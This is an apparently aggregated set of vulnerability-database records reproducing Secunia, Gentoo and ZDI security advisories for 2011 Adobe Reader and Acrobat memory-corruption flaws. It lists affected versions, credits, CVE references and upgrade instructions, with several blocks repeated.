Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0567 and CVE-2011-0603. Adobe Reader and Acrobat contain a vulnerability that allows arbitrary code execution or a denial-of-service (DoS) condition; it is distinct from CVE-2011-0567 and CVE-2011-0603. A third party could execute arbitrary code or cause a denial of service (DoS) via a crafted image.
Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network.
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) An input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in an RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing the bits-per-pixel and
number-of-colors values of 4/8-bit RLE compressed BMP files can be
exploited to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing an ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0023 | CVE-2011-0567 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
AcroRd32.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image that triggers an incorrect pointer calculation, leading to heap memory corruption, a different vulnerability than CVE-2011-0566 and CVE-2011-0603. Adobe Reader and Acrobat contain a vulnerability that allows arbitrary code execution or a denial-of-service (DoS) condition; it is distinct from CVE-2011-0566 and CVE-2011-0603. A third party could execute arbitrary code or cause a denial of service (DoS) via a crafted image. User interaction is required to exploit this vulnerability, in that the target must visit a malicious page or open a malicious file. The specific flaw exists within AcroRd32.dll. Initially, a pointer passed to memset can be miscalculated, and the resulting copy operation corrupts heap memory. Later, the application attempts to use the modified data, which can be leveraged to execute arbitrary code in the context of the user invoking the Reader application.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network.
The specific flaw exists within AcroRd32.dll.
-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb11-03.html
-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2011-02-08 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Abdullah Ada
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) An input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in an RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors of 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing an ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused by vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
----------------------------------------------------------------------
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0021 | CVE-2011-0565 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585. This is a different vulnerability from CVE-2011-0585. An attacker could execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected application to crash.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network.
----------------------------------------------------------------------
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in an RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors of 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing an ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused by vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
